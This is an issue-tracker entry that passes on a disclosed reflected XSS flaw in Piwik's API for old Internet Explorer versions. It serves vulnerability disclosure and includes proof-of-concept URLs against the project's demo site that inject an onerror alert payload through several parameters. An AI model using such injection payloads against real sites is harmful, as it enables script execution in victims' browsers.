xss affecting IE6, IE7 and IE8 #6053
Labels
Bug
For errors / faults / flaws / inconsistencies etc.
c: Security
For issues that make Matomo more secure. Please report issues through HackerOne and not in Github.
Major
Indicates the severity or impact or benefit of an issue is much higher than normal but not critical.
Milestone
Here is the report to our security team
reproduce
http://demo.piwik.org/index.php/.html?date=yesterday&module=API&format=json&method=SitesManager.getImageTrackingCode&idSite=1&period=day&piwikUrl=%3Cimg%20src%3dx%20onerror%3dalert('XSS')%3E&actionName=&token_auth=12121
Also http://demo.piwik.org/index.php/.html?date=yesterday&module=API&format=json&method=SitesManager.getImageTrackingCode&idSite="><img%20src=x%20onerror=alert('XSS')>&period=day&piwikUrl=1&actionName=&token_auth=12121
Also http://demo.piwik.org/index.php/.html?module=API&method=UserCountry.getLocationFromIP&ip="><image%20src=x%20onerror=alert('XSS')>&format=JSON&
double check whether you have filtered the parameter customCampaignKeywordParam,customCampaignNameQueryParam
Just make a request to your demo website under IE 7, IE8(I tested on IE8.0.6001.17184 Version), you will find injected javascript code
<img src=x onerror=alert('XSS')>
will be executed. You will be unable to exploit these vulnerability in a modern browser because the content type of the response body of the request is application/json. Modern browser will not render this content-type. That is why you could only exploit it in IE6, IE7 and IE8(some versions).details
If you check the source code, it is basically caused by the following code in API.php: https://github.com/piwik/piwik/blob/8d1f1b39f26bc00394af5ac220b6bd97ca89537f/plugins/SitesManager/API.php#L129
There is no check or validation for the parameter piwikUrl to filter malicious characters. This vulnerability has been there since Piwik 2.2.0 Version. Please let me know. In the attachment is a screenshot of the exploitation against demo.piwik.org website in IE7.
Note from Piwik security team
We generally do not communicate via issues on XSS issues in Piwik (some have called it
security by obscurity
but we definitely disagree with that). Because this issue affects only IE6 IE7 IE8 it has limited impact and so we decided to track it in a github issue.The text was updated successfully, but these errors were encountered: